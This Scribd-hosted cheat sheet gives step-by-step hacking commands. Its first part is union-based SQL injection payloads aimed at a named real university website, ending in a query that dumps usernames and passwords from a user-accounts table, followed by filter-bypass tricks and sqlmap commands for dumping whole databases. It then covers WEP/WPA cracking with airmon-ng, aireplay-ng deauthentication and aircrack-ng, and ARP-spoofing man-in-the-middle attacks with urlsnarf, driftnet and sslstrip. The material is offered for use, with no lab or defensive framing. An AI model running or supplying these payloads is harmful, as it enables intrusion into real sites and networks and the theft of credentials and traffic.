Scribd
Upload
108 views

SQL CMD

This document discusses various techniques for performing SQL injection and wireless hacking. It provides steps for using sqlmap to find databases, tables, columns and dump data from a vulnerable SQL site. It also outlines the process for cracking WEP security including using airmon-ng, airodump-ng, aireplay-ng and aircrack-ng. Commands are given for man-in-the-middle attacks using arpspoof and driftnet/urlsnarf, with additional steps provided for SSL stripping attacks.

Uploaded by

Vivek Gautam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
108 views

SQL CMD

This document discusses various techniques for performing SQL injection and wireless hacking. It provides steps for using sqlmap to find databases, tables, columns and dump data from a vulnerable SQL site. It also outlines the process for cracking WEP security including using airmon-ng, airodump-ng, aireplay-ng and aircrack-ng. Commands are given for man-in-the-middle attacks using arpspoof and driftnet/urlsnarf, with additional steps provided for SSL stripping attacks.

Uploaded by

Vivek Gautam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

union base sql-injection

~~~~~~~~~~~~~~~~~~~

Functions
database() || for finding the database name
version() || for finding the version of the db
user() || for finding the root user of the db
group_concat() || for make the collection of the different things

Step:1 find the parameter value || somthing=somthing

Step:2 apply single quote '


EX:www.site.com/products.php?id=15'

Step:3 find number of columns


id=15 order by 1-- || for union base sqli
id=15'order by 1-- - || for string base sqli
http://www.bzu.edu.pk/departmentindex.php?id=-48'order by 16-- -

Step:4 now find vul column

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Step:5 Now find the tables

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from
information_schema.table_constraints-- -
Step 6: Now finding the columns

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from
information_schema.columns where table_name='useraccounts'-- -

Step 7:fetching Data

uname,upassword
0x3a=:

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(uname,0x3a,upassword),8,9,10,11,12,13,14,15 from
useraccounts-- -

For mode security:


add /*!union*/ select
or
add /*!union*/ select
or
add /*!12345union*/ select

add where ever it works

SQL Map

Assuming shu.co.in/lol.php?id=50
check if the site is vulernable or not
Step 1: sqlmap.py -u s.in/lol.php?id=50 --dbs //to find the database
assume database name is sh

Step 2: sqlmap.py -u .co.in/lol.php?id=50 -D s --tables //to find the tables


assume the table name is users

Step 3: sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to find the


columns

Step 4: sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump


the data

alternative

sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

or

sqlmap.py -u .co.in/lol.php?id=50 -D sh --dump //to dump the data of a perticular


database

SQL Map for kali

Assuming sh.co.in/lol.php?id=50
check if the site is vulernable or not

Step 1: sqlmap -u sh.co.in/lol.php?id=50 --dbs //to find the database


assume database name is shubham_choudhary

Step 2: sqlmap -u shu.co.in/lol.php?id=50 -D sh --tables //to find the tables


assume the table name is users

Step 3: sqlmap -u sh.co.in/lol.php?id=50 -D sh -T users --columns //to find the


columns

Step 4: sqlmap -u sh.co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the


data

alternative

sqlmap -u shu.co.in/lol.php?id=50 --dump //to dump all databases

or

sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary --dump //to dump the data


of a perticular database

SQL Map for backtrack

Assuming .co.in/lol.php?id=50
check if the site is vulernable or not
Step 1: python sqlmap.py -u .co.in/lol.php?id=50 --dbs //to find the database
assume database name is sh

Step 2: python sqlmap.py -u .co.in/lol.php?id=50 -D shu --tables //to find the


tables
assume the table name is users

Step 3: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to


find the columns

Step 4: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to


dump the data

alternative

python sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

or

python sqlmap.py -u s.co.in/lol.php?id=50 -D sh --dump //to dump the data of a


perticular database

Wireless hacking

WI-FI
~~~~
~what is wi-fi?
~what is guided medium?
data base is transfer which is guided by wire.
~what is unguided meduim?
data is transfered with unguided(air) meduim.

~Their are two type of security(WEP,WPA,WPA2,WPS)

WEP
~~~
wireless equivalent privacy

airmon,airodump,aireplay,aircrack
WEP-CRACKING
~~~~~~~~~~

STEP:1->airmon-ng ||display the wireless cards


STEP:2->airmon-ng start wlan0 ||For enable the monitor mode.
STEP:3->airodump-ng mon0 || for scan the wi-fi
STEP:4->airodump-ng -w abc -c 1 --bssid 00:25:5E:33:FB:7C mon0 ||this is used to
select a particular wifi router.
STEP:5->aireplay-ng --deauth 0 -a 00:25:5E:33:FB:7C mon0
STEP:6->aireplay-ng -arpreplay -b 00:25:5E:33:FB:7C mon0
STEP:7->aircrack-ng sh-01.cap

WPA
~~~
1-6 same
STEP:7->aircrack-ng -w dc.txt shubham-01.cap
if the error comes and then use
--ignore-negative-one

Command For mimt attack(man in middle attack)

step 1 : arpspoof -i wlan0/eth0 -t (target 1 ip) (target 2 ip)


ex arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
step 2 : arpspoof -i wlan0/eth0 -t (target 1 ip) (target 2 ip)
ex arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105

Step 3 : urlsnarf
ex urlsnarf -i wlan0
ex urlsnarf //for lan(eth0 port)
step 4 : driftnet
ex driftnet -i wlan0
ex driftnet // for lan(eth0 port)

Command for mimt attack with ssl strip

Step 1 : echo 1 > /proc/sys/net/ipv4/ip_forward


Step 2 : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT
--to-port 8080
Step 3 : arpspoof -i <interface> -t <target IP> <gateway IP>
Step 4 : arpspoof -i <interface> -t <gateway IP> <target IP>
Step 5 : sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log
Step 6 : tail -F /root/Desktop/sslstrip.log

You might also like